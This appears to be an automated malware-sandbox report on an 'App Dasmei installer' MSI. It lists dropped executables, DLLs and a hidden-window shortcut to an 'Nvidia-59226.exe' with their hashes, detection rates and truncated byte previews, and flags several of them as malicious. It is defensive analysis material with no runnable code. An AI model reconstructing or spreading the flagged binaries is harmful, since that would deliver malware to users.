                                                                        Preview:5D.?VS4R#.bl../..O+.O?W..<3.-..0.dq2:......s...(.l....a:B.-.U..q.wj...........n4.....y.>.i...x.}...F....o...i<..x'.....k.82B.q....CJ..@....D/.N.tbR2\...Y.Ej......].9...N.."Pi.,.&jz....,%?. ....z.y9k..K[D..E.b.~I.].~Z.[..X\......n..u....u.....H....$.(.B..,..|.T.....<.X....oh.P.q..E.C..H...Yz%%.V...l.cB30......%..K0....7.4z..@..,.~~K.|R.D0`...c.y.9e._..y..9.....\E.i:...P?...{.K....Z....Z..^W..=l.A../{!.dZ.\c. V-D.[..)..s...}>..B@...@.0.U(....ud....I.>.;..&.u.+,p@E.g]+.;.sd........#.b..Wb.m..>....[:?Z...$T.V.-..9.`.....(ZB\x ...6.5u...7h.{..J.1...@....7.......|...)...B.....Lu[.....4i.1..'+.t]Z.n.ej..{S.ql...-..=q...q.....?.5..(1...6x..G..'..mYC....2_-]....8.%..%..TgK.:.....XKn..P..h(.c\....o...dZ9k.E...9d.h..`...5..i..$K..K|.C..g.....{B.Q..YZ..5~...L.,+..a.o....a...S.\jG..3...<....K#....25,..6..9!m.c'..K...TW.;.<..-..w..7u..g..p..nM4.L..............;......D....".... .S.A..2..D....(..u.hA ...<:..L..x..c...C.........dz4..b.MI..q.[/{
                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                        File Type:ASCII text, with no line terminators
                                                                        Category:dropped
                                                                        Size (bytes):60
                                                                        Entropy (8bit):4.038920595031593
                                                                        Encrypted:false
                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                        Malicious:false
                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                        File Type:ASCII text, with no line terminators
                                                                        Category:dropped
                                                                        Size (bytes):60
                                                                        Entropy (8bit):4.038920595031593
                                                                        Encrypted:false
                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                        Malicious:false
                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                        File Type:ASCII text, with no line terminators
                                                                        Category:dropped
                                                                        Size (bytes):60
                                                                        Entropy (8bit):4.038920595031593
                                                                        Encrypted:false
                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                        Malicious:false
                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                        File Type:ASCII text, with no line terminators
                                                                        Category:dropped
                                                                        Size (bytes):60
                                                                        Entropy (8bit):4.038920595031593
                                                                        Encrypted:false
                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                        Malicious:false
                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                        File Type:ASCII text, with no line terminators
                                                                        Category:dropped
                                                                        Size (bytes):60
                                                                        Entropy (8bit):4.038920595031593
                                                                        Encrypted:false
                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                        Malicious:false
                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                        File Type:ASCII text, with no line terminators
                                                                        Category:dropped
                                                                        Size (bytes):60
                                                                        Entropy (8bit):4.038920595031593
                                                                        Encrypted:false
                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                        Malicious:false
                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                        Process:C:\Windows\SysWOW64\msiexec.exe
                                                                        File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                        Category:dropped
                                                                        Size (bytes):133536
                                                                        Entropy (8bit):4.887141700027076
                                                                        Encrypted:false
                                                                        SSDEEP:3072:6xh9iQPz6TYcwoMEFBW1vxzXY8F+0FzWLKH:+9D6TYcwoMEFBW1vTH
                                                                        MD5:79AB86017B2C9B713D6AF08086B1937F
                                                                        SHA1:4214A09A7A12B341B9B5290B448E2A321A1F4566
                                                                        SHA-256:07B5B4156D1F3ADBB7728BA7A7D538AF04E7CCA8E396A19F5446BB2043A6E3DB
                                                                        SHA-512:6BE2C7385C6E2796993D8EAD6CF8B12E0114213E633C902653AA7069E3DC2C4E7354DEF3C8565186140B3F5A59B09E685C9E775C4EC8CF55201A9437E1E15428
                                                                        Malicious:true
                                                                        Antivirus:
                                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                        • Antivirus: ReversingLabs, Detection: 26%
                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...'.dg................................. ........@.. .......................@.......<....@.....................................S.......H................)... ....................................................... ............... ..H............text........ ...................... ..`.rsrc...H...........................@..@.reloc....... ......................@..B........................H.......|$................................................................(....**.u.......*..0..H.......r...p.(.....r...pr...p.(....r...p.(.....r...pr...p.(......(....-.r...p(....(....o.....rA..p.(....rA..p(.................rG..p.........r...p....r...p(........r...p.........r"..p.........r(..p...(............(........~....-........s.........~.....o....o........o....rT..p.$o..........o........o....rt..p.$o...........o......o....*F(.....(....o....*...0..".......~....,.r...p( ..
                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                        File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Fri Dec 20 13:43:37 2024, mtime=Fri Dec 20 13:43:37 2024, atime=Wed Dec 18 08:09:54 2024, length=8816544, window=hide
                                                                        Category:modified
                                                                        Size (bytes):695
                                                                        Entropy (8bit):4.589634143973999
                                                                        Encrypted:false
                                                                        SSDEEP:12:8KcZ8i/qD603Un7nd0zKuI3UnGOjAU9Y2FYq3Un+3UnfzaEmV:8LkU7n2Ku4UGyAU9YQY6UOUfzVm
                                                                        MD5:0A1C99A01921B656987E26A81E2EE422
                                                                        SHA1:48E69976F7F948DC4B0D998F666EAEE11ADDE785
                                                                        SHA-256:A3B912E4415B9D1B8118CD3C0D788678FE34C51715BDB478FFF4493AB13DBA0D
                                                                        SHA-512:EE8A574854947F367E88E69EEE04386D25BEA29FFC9768C9501E41F8794AB2BC64389FD7E70AB09832C31E1F1B1CC1F18A9CD09B9F8183D2D554B1B4C339C389
                                                                        Malicious:true
                                                                        Preview:L..................F.... .......R..m...R.....,Q...............................P.O. .:i.....+00.../C:\...................b.1......Ytu..NVIDIA~1..J......Yeu.Ytu..........................C...N.v.i.d.i.a.-.5.9.2.2.6.....n.2......Y;I .NVIDIA~1.EXE..R......Ysu.Ysu....t.........................N.v.i.d.i.a.-.5.9.2.2.6...e.x.e.......O...............-.......N...........|..Z.....C:\Nvidia-59226\Nvidia-59226.exe..8.....\.....\.....\.....\.....\.....\.....\.....\.....\.N.v.i.d.i.a.-.5.9.2.2.6.\.N.v.i.d.i.a.-.5.9.2.2.6...e.x.e.`.......X.......528110...........hT..CrF.f4... .L.......-...-$..hT..CrF.f4... .L.......-...-$.E.......9...1SPS..mD..pH.H@..=x.....h....H.....K...YM...?................
                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                        File Type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, MSI Installer, Security: 0, Code page: 1252, Revision Number: {384277A5-9BB1-41F5-9CA9-30F1AFE51F66}, Number of Words: 2, Subject: App Dasmei installer, Author: Dasmei support, Name of Creating Application: App Dasmei installer, Template: ;1046, Comments: A base dados do instalador contm a lgica e os dados necessrios para instalar o App Dasmei installer., Title: Installation Database, Keywords: Installer, MSI, Database, Create Time/Date: Thu Dec 19 23:45:40 2024, Last Saved Time/Date: Thu Dec 19 23:45:40 2024, Last Printed: Thu Dec 19 23:45:40 2024, Number of Pages: 450
                                                                        Category:dropped
                                                                        Size (bytes):3372544
                                                                        Entropy (8bit):7.173942906440104
                                                                        Encrypted:false
                                                                        SSDEEP:49152:hYN/c/f9r84jEHYDgE5e7vCiHAZP5Ferq7I5RJK5k10924iQ/hPGLTGO5T:iVHYDgpW7xFeIiQ/gLTGO5T
                                                                        MD5:41744D644791BDBBCFF4B05A3E1E98E0
                                                                        SHA1:9B7E8548591F1578309CEFD2841E757B1656F00A
                                                                        SHA-256:145A0149BC4D8A21D43BF013097C3D9D2A2DB07C84FD52F80168ED898E22F5AE
                                                                        SHA-512:42B730272999AA060D42747DCD8855E164C06831AA30CCFC2A4448C4465D5C19BC3EA04ECD7C3257C763999E07FC644CF1485DDB09E9D25D24045D30A5BF28BA
                                                                        Malicious:false
                                                                        Preview:......................>...................4...................................J.......x.......q...r...s...t...u...v...w...................................................................................................................................................................................................................................................................................................................................................................................................................................%...7........................................................................................... ...!..."...#...$.../...4...'...(...)...*...+...,...-...........0...1...2...3...8...5...6...@...C...9...:...;...<...=...>...?...3...A...B...m...D...E...F...G...H...I...S.......L...M...N...O...P...Q...R...S...T...U...V...W...X...Y...Z...[...\...]...^..._...`...a...b...c...d...e...f...g...h...i...j...k...l...m...n...o...p...q...r...s...t...u...v...w...x...y...z...
                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                        File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                        Category:dropped
                                                                        Size (bytes):925800
                                                                        Entropy (8bit):6.5962529078695535
                                                                        Encrypted:false
                                                                        SSDEEP:24576:fuPYAGxUherZNh0lhSMXlrI5s2JK5kmwE:2P5Ferq7I5RJK5k1E
                                                                        MD5:421643EE7BB89E6DF092BC4B18A40FF8
                                                                        SHA1:E801582A6DD358060A699C9C5CDE31CD07EE49AB
                                                                        SHA-256:D6B89FD5A95071E7B144D8BEDCB09B694E9CD14BFBFAFB782B17CF8413EAC6DA
                                                                        SHA-512:D59C4EC7690E535DA84F94BEF2BE7F94D6BFD0B2908FA9A67D0897ABE8A2825FD52354C495EA1A7F133F727C2EE356869CC80BACF5557864D535A72D8C396023
                                                                        Malicious:true
                                                                        Antivirus:
                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                        Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$........u....i..i..i.zfj..i.zfl...i.k.m..i.k.j..i.k.l...i.zfm..i.zfo..i.zfh..i..h.n.i.Z.`...i.Z.i..i.Z....i.....i.Z.k..i.Rich..i.........................PE..L......f.........."!...'.....&......p0.......................................0.......p....@A.........................&......./..,.......................h:..............p...........................0...@............................................text...Z........................... ..`.rdata...[.......\..................@..@.data....(...P.......2..............@....rsrc................F..............@..@.reloc...............P..............@..B........................................................................................................................................................................................................................................................................
                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                        File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                        Category:dropped
                                                                        Size (bytes):925800
                                                                        Entropy (8bit):6.5962529078695535
                                                                        Encrypted:false
                                                                        SSDEEP:24576:fuPYAGxUherZNh0lhSMXlrI5s2JK5kmwE:2P5Ferq7I5RJK5k1E
                                                                        MD5:421643EE7BB89E6DF092BC4B18A40FF8
                                                                        SHA1:E801582A6DD358060A699C9C5CDE31CD07EE49AB
                                                                        SHA-256:D6B89FD5A95071E7B144D8BEDCB09B694E9CD14BFBFAFB782B17CF8413EAC6DA
                                                                        SHA-512:D59C4EC7690E535DA84F94BEF2BE7F94D6BFD0B2908FA9A67D0897ABE8A2825FD52354C495EA1A7F133F727C2EE356869CC80BACF5557864D535A72D8C396023
                                                                        Malicious:true
                                                                        Antivirus:
                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                        Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$........u....i..i..i.zfj..i.zfl...i.k.m..i.k.j..i.k.l...i.zfm..i.zfo..i.zfh..i..h.n.i.Z.`...i.Z.i..i.Z....i.....i.Z.k..i.Rich..i.........................PE..L......f.........."!...'.....&......p0.......................................0.......p....@A.........................&......./..,.......................h:..............p...........................0...@............................................text...Z........................... ..`.rdata...[.......\..................@..@.data....(...P.......2..............@....rsrc................F..............@..@.reloc...............P..............@..B........................................................................................................................................................................................................................................................................
                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                        File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                        Category:dropped
                                                                        Size (bytes):925800
                                                                        Entropy (8bit):6.5962529078695535
                                                                        Encrypted:false
                                                                        SSDEEP:24576:fuPYAGxUherZNh0lhSMXlrI5s2JK5kmwE:2P5Ferq7I5RJK5k1E
                                                                        MD5:421643EE7BB89E6DF092BC4B18A40FF8
                                                                        SHA1:E801582A6DD358060A699C9C5CDE31CD07EE49AB
                                                                        SHA-256:D6B89FD5A95071E7B144D8BEDCB09B694E9CD14BFBFAFB782B17CF8413EAC6DA
                                                                        SHA-512:D59C4EC7690E535DA84F94BEF2BE7F94D6BFD0B2908FA9A67D0897ABE8A2825FD52354C495EA1A7F133F727C2EE356869CC80BACF5557864D535A72D8C396023
                                                                        Malicious:true
                                                                        Antivirus:
                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                        Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$........u....i..i..i.zfj..i.zfl...i.k.m..i.k.j..i.k.l...i.zfm..i.zfo..i.zfh..i..h.n.i.Z.`...i.Z.i..i.Z....i.....i.Z.k..i.Rich..i.........................PE..L......f.........."!...'.....&......p0.......................................0.......p....@A.........................&......./..,.......................h:..............p...........................0...@............................................text...Z........................... ..`.rdata...[.......\..................@..@.data....(...P.......2..............@....rsrc................F..............@..@.reloc...............P..............@..B........................................................................................................................................................................................................................................................................
                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                        File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                        Category:dropped
                                                                        Size (bytes):925800
                                                                        Entropy (8bit):6.5962529078695535
                                                                        Encrypted:false
                                                                        SSDEEP:24576:fuPYAGxUherZNh0lhSMXlrI5s2JK5kmwE:2P5Ferq7I5RJK5k1E
                                                                        MD5:421643EE7BB89E6DF092BC4B18A40FF8
                                                                        SHA1:E801582A6DD358060A699C9C5CDE31CD07EE49AB
                                                                        SHA-256:D6B89FD5A95071E7B144D8BEDCB09B694E9CD14BFBFAFB782B17CF8413EAC6DA
                                                                        SHA-512:D59C4EC7690E535DA84F94BEF2BE7F94D6BFD0B2908FA9A67D0897ABE8A2825FD52354C495EA1A7F133F727C2EE356869CC80BACF5557864D535A72D8C396023
                                                                        Malicious:true
                                                                        Antivirus:
                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                        Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$........u....i..i..i.zfj..i.zfl...i.k.m..i.k.j..i.k.l...i.zfm..i.zfo..i.zfh..i..h.n.i.Z.`...i.Z.i..i.Z....i.....i.Z.k..i.Rich..i.........................PE..L......f.........."!...'.....&......p0.......................................0.......p....@A.........................&......./..,.......................h:..............p...........................0...@............................................text...Z........................... ..`.rdata...[.......\..................@..@.data....(...P.......2..............@....rsrc................F..............@..@.reloc...............P..............@..B........................................................................................................................................................................................................................................................................
                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                        File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                        Category:dropped
                                                                        Size (bytes):925800
                                                                        Entropy (8bit):6.5962529078695535
                                                                        Encrypted:false
                                                                        SSDEEP:24576:fuPYAGxUherZNh0lhSMXlrI5s2JK5kmwE:2P5Ferq7I5RJK5k1E
                                                                        MD5:421643EE7BB89E6DF092BC4B18A40FF8
                                                                        SHA1:E801582A6DD358060A699C9C5CDE31CD07EE49AB
                                                                        SHA-256:D6B89FD5A95071E7B144D8BEDCB09B694E9CD14BFBFAFB782B17CF8413EAC6DA
                                                                        SHA-512:D59C4EC7690E535DA84F94BEF2BE7F94D6BFD0B2908FA9A67D0897ABE8A2825FD52354C495EA1A7F133F727C2EE356869CC80BACF5557864D535A72D8C396023
                                                                        Malicious:true
                                                                        Antivirus:
                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                        Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$........u....i..i..i.zfj..i.zfl...i.k.m..i.k.j..i.k.l...i.zfm..i.zfo..i.zfh..i..h.n.i.Z.`...i.Z.i..i.Z....i.....i.Z.k..i.Rich..i.........................PE..L......f.........."!...'.....&......p0.......................................0.......p....@A.........................&......./..,.......................h:..............p...........................0...@............................................text...Z........................... ..`.rdata...[.......\..................@..@.data....(...P.......2..............@....rsrc................F..............@..@.reloc...............P..............@..B........................................................................................................................................................................................................................................................................
                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                        File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                        Category:dropped
                                                                        Size (bytes):326760
                                                                        Entropy (8bit):6.846394664994345
                                                                        Encrypted:false
                                                                        SSDEEP:6144:oeiVnZIYbSVSeiHvf1hwph0lhSMXlBXBW/UhCw:o9VnZHbmSeiHjwph0lhSMXleUUw
                                                                        MD5:7383FCD1998F99825AFEEA8FCC37B651
                                                                        SHA1:1572928164C5B8184631CFF07D549AD0A798430A
                                                                        SHA-256:2DBED94E7193DB800E16E0016E5F15C7FC140368A8838CF24CA27F2E049B98DC
                                                                        SHA-512:304C1D2FFC222E6666A0AC652EE914D6695BF80860EAA7FBAADEB0FD64231329DC408135468F0903C7EE80EBF132AF94A3EC91309E69063F36FD79E57679C7D4
                                                                        Malicious:true
                                                                        Antivirus:
                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........{...{...{.G.x...{.G.~.2.{.G.....{.Vz....{.Vzx...{.Vz~...{.G.z...{...z...{.gyr...{.gy{...{.gy....{.....{.gyy...{.Rich..{.........PE..L...7..f.........."!...'............@........ ............................................@A...............................x...P.......................h:...........g..p....................h.......f..@............ ...............................text...Z........................... ..`.rdata...|... ...~..................@..@.data...............................@....rsrc...............................@..@.reloc..............................@..B................................................................................................................................................................................................................................................................................................
                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                        File Type:data
                                                                        Category:dropped
                                                                        Size (bytes):746556
                                                                        Entropy (8bit):6.689706888330362
                                                                        Encrypted:false
                                                                        SSDEEP:12288:E9VnZHbmSeiHjwph0lhSMXleUU/6FaqMeU/Hzb9r84jEIWOlDgSNj43HkbX5301W:E9VZHbm3iKh0lhSMXlw/CaqMr/f9r84V
                                                                        MD5:095725A6ECB9FC382E57B77A6AC6F943
                                                                        SHA1:73F4AA32E2AC159C0F66EAC21B7D5ADD5A8A892C
                                                                        SHA-256:21091A970AA812671743F26F19C138219FA374651B913F3A2ED93F4FE7DB921D
                                                                        SHA-512:FA449E84C0BBCA514D91EC9F19BCBDE2641AF4F77C78241DCEE6DCF239F29DB1A0ADF3C1D642A742472F5C313727F72F1EDEF0077ED6812AA4DE95EF712677AC
                                                                        Malicious:false
                                                                        Preview:...@IXOS.@.....@cM.Y.@.....@.....@.....@.....@.....@......&.{A9CC6EF7-3385-4831-8011-67303F5E511F}..App Dasmei installer..cB1ItKbbhY.msi.@.....@.....@.....@........&.{384277A5-9BB1-41F5-9CA9-30F1AFE51F66}.....@.....@.....@.....@.......@.....@.....@.......@......App Dasmei installer......Rollback..A.....o. .d.e. .r.e.s.t.a.u.r.a.....o.....RollbackCleanup..Removendo arquivos de backup..Arquivo: [1]...@.......@........AI_RemoveAllTempFiles....J...AI_RemoveAllTempFiles.@......h...MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........{...{...{.G.x...{.G.~.2.{.G.....{.Vz....{.Vzx...{.Vz~...{.G.z...{...z...{.gyr...{.gy{...{.gy....{.....{.gyy...{.Rich..{.........PE..L...7..f.........."!...'............@........ ............................................@A...............................x...P.......................h:...........g..p....................h.......f..@............ ...............................text
                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                        Category:modified
                                                                        Size (bytes):416256
                                                                        Entropy (8bit):6.496867870144503
                                                                        Encrypted:false
                                                                        SSDEEP:12288:w6FaqMeU/Hzb9r84jEIWOlDgSNj43HkbX53017vi:wCaqMr/f9r84jEHYDgO15E17v
                                                                        MD5:D2F8C062ABA50CA096CBD5387A2D0B8B
                                                                        SHA1:04F07790822954D02458D93FBA83208CA5223A1A
                                                                        SHA-256:EA6094300C250528FFAE4E7972D84EB5B45CFBD018133516C166E40E89ED65BF
                                                                        SHA-512:F51BF12BE51832CD7190C255234C558094C0135E8BF05FFD67C2F4A8B0233161FA71C44E86B107956E4B75F5E2A28DA58736DA61A71F0C600EC1CF1B4E9E86FA
                                                                        Malicious:true
                                                                        Antivirus:
                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........$.J...J...J...I...J...O...J.n.N...J.n.I...J.n.O...J...N...J...L...J...K...J...K.c.J._.C...J._.....J......J._.H...J.Rich..J.................PE..L......f.........."....'............ .............@..................................)....@..........................................P..8....................`...;......p..............................@...............l............................text............................... ..`.rdata...".......$..................@..@.data...08..........................@....rsrc...8....P......................@..@.reloc...;...`...<..................@..B........................................................................................................................................................................................................................................................................................
                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                        File Type:Composite Document File V2 Document, Cannot read section info
                                                                        Category:dropped
                                                                        Size (bytes):49152
                                                                        Entropy (8bit):0.7686327508722366
                                                                        Encrypted:false
                                                                        SSDEEP:12:JSbX72Fjz6AGiLIlHVRpZh/7777777777777777777777777vDHFdFK3it/l0i8Q:JsQI5tbFKGiF
                                                                        MD5:AC89F2CD8B97866541D7C42A6DC8A7D2
                                                                        SHA1:6BDB8BE7C7BC0E170914B105213BD6CBF93409F8
                                                                        SHA-256:5233E113C9EA2FD711D97C0DB4B90F8E1FE6153418AF69F6DA1A1677007A63CE
                                                                        SHA-512:CEFB922976D50F34160D1D9E870137BF0473CD173118E00375555B92267CB6BBCCFCB215E806D5D4A8E092BA0784594ABBF3EA2B7AAE65867D637AC98FCEEE62
                                                                        Malicious:false
                                                                        Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                        File Type:Composite Document File V2 Document, Cannot read section info
                                                                        Category:dropped
                                                                        Size (bytes):32768
                                                                        Entropy (8bit):1.399287818853415
                                                                        Encrypted:false
                                                                        SSDEEP:48:oNeu6HM+CFXJBT55MgldfAEkrCyESkdgPqh5TuZvB5MdfAEkrCyESkdLToqDFT:cecZT3ZQRC7sVRC76q
                                                                        MD5:009911899A54A4D0761B00E98B22CB5F
                                                                        SHA1:4878DEFD9AF83D5198DBBA032D8555262388E9F0
                                                                        SHA-256:5F12539174A9938CF319E0990B3AA373A55964F334F5034F63507062B22C17EE
                                                                        SHA-512:1E24EEEFBCD4C95BA277638B0B605E544C5109EBFB6B18869E134CF9E76D0446DC564999D9059A795EC6450B49FDBA41A5322598E32ADA83F6218EA90FAFE8C0
                                                                        Malicious:false
                                                                        Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                        File Type:Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                        Category:dropped
                                                                        Size (bytes):360001
                                                                        Entropy (8bit):5.362994091160301
                                                                        Encrypted:false
                                                                        SSDEEP:1536:6qELG7gK+RaOOp3LCCpfmLgYI66xgFF9Sq8K6MAS2OMUHl6Gin327D22A26Kgaub:zTtbmkExhMJCIpEy
                                                                        MD5:340075DC895E2E8495B58F1119E12A67
                                                                        SHA1:20EDE756066E0021E35A035305C253C38FEC118F
                                                                        SHA-256:7C59F4C91C7132F5A077B36BB735A3786C8D41A386504DA6267FB4940DFAFDB6
                                                                        SHA-512:C58A9F41A70A9E63AE38928AB2B31BD65587587647C0EB6E40057325C3513AA58AE8DF4669B2E76FA5EFA1025F44B2CB98C971B80DA26453237A0C410DF3873D
                                                                        Malicious:false
                                                                        Preview:.To learn about increasing the verbosity of the NGen log files please see http://go.microsoft.com/fwlink/?linkid=210113..12/07/2019 14:54:22.458 [5488]: Command line: D:\wd\compilerTemp\BMT.200yuild.1bk\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe executeQueuedItems /nologo ..12/07/2019 14:54:22.473 [5488]: Executing command from offline queue: install "System.Runtime.WindowsRuntime.UI.Xaml, Version=4.0.0.0, Culture=Neutral, PublicKeyToken=b77a5c561934e089, processorArchitecture=msil" /NoDependencies /queue:1..12/07/2019 14:54:22.490 [5488]: Executing command from offline queue: install "System.Web.ApplicationServices, Version=4.0.0.0, Culture=Neutral, PublicKeyToken=31bf3856ad364e35, processorArchitecture=msil" /NoDependencies /queue:3..12/07/2019 14:54:22.490 [5488]: Exclusion list entry found for System.Web.ApplicationServices, Version=4.0.0.0, Culture=Neutral, PublicKeyToken=31bf3856ad364e35, processorArchitecture=msil; it will not be installed..12/07/2019 14:54:22.490 [
                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                        File Type:Composite Document File V2 Document, Cannot read section info
                                                                        Category:dropped
                                                                        Size (bytes):32768
                                                                        Entropy (8bit):1.399287818853415
                                                                        Encrypted:false
                                                                        SSDEEP:48:oNeu6HM+CFXJBT55MgldfAEkrCyESkdgPqh5TuZvB5MdfAEkrCyESkdLToqDFT:cecZT3ZQRC7sVRC76q
                                                                        MD5:009911899A54A4D0761B00E98B22CB5F
                                                                        SHA1:4878DEFD9AF83D5198DBBA032D8555262388E9F0
                                                                        SHA-256:5F12539174A9938CF319E0990B3AA373A55964F334F5034F63507062B22C17EE
                                                                        SHA-512:1E24EEEFBCD4C95BA277638B0B605E544C5109EBFB6B18869E134CF9E76D0446DC564999D9059A795EC6450B49FDBA41A5322598E32ADA83F6218EA90FAFE8C0
                                                                        Malicious:false
                                                                        Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                        File Type:data
                                                                        Category:dropped
                                                                        Size (bytes):32768
                                                                        Entropy (8bit):0.07117846301092375
                                                                        Encrypted:false
                                                                        SSDEEP:6:2/9LG7iVCnLG7iVrKOzPLHKOqsfdK5PnbAWkgVky6lit/:2F0i8n0itFzDHFdFKkit/
                                                                        MD5:07BA82554FA4F1682DC44FF7DE576A13
                                                                        SHA1:374CB28128319AA74236D7D93829F636A2BDEFC7
                                                                        SHA-256:D4E18425FF497014266ECBB967E7AB750AECE385D422C13A22D869B2B98C13C1
                                                                        SHA-512:BEA9B5D417CF47782AD9BB4CC648A66DAC9370C1B1ED590706EEDB7F5696C82B173818A276B050E5E60EB8FD04197861A4CEEAA89E67DBAEFE95F57E5BAF01D0
                                                                        Malicious:false
